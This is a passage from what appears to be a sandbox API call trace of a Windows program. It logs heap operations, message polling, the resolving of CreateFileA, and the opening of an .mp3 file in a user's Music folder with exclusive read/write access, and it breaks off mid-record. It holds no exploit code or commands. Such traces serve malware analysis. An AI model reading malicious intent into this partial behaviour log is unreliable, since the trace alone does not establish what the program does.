wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.716] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0187.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0187.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0187.716] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0187.716] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0187.716] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0187.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0187.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0187.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9b68 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0187.717] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0187.717] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.717] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0187.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0187.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0187.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0187.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0187.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0187.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0187.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0187.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0187.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0187.718] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0187.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0187.718] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0187.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0187.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0187.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0187.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0187.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0187.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0187.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0187.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0187.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0187.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0187.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0187.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0187.719] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.719] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0187.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0187.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0187.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0187.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0187.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0187.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0187.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0187.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0187.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0187.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0187.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0187.720] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0187.720] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0187.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0187.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0187.721] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0187.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0187.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0187.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0187.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0187.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0187.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0187.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0187.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0187.721] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0187.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0187.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0187.721] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0187.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0187.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0187.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0187.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0187.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0187.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0187.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0187.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0187.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0187.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0187.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0187.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0187.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0187.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0187.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0187.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0187.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0187.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0187.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0187.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0187.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0187.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0187.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0187.724] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0187.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0187.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0187.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0187.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bdb10 [0187.724] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bdb10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0187.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.725] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0187.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0187.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0187.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0187.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0187.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0187.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0187.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0187.725] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bdb10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0187.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0187.725] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0187.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0187.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0187.725] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0187.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0187.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0187.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0187.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0187.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0187.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0187.725] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0187.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0187.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0187.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0187.726] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0187.726] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3", cchWideChar=64, lpMultiByteStr=0x8db138, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3", lpUsedDefaultChar=0x0) returned 64 [0187.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0187.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0187.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0187.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0187.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0187.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0187.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0187.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0187.726] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0187.726] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\RRCvJ.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\rrcvj.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0187.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0187.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0187.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0187.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0187.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0187.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0187.728] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0187.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0187.728] HeapFree (in: hHeap=0x8a0000, 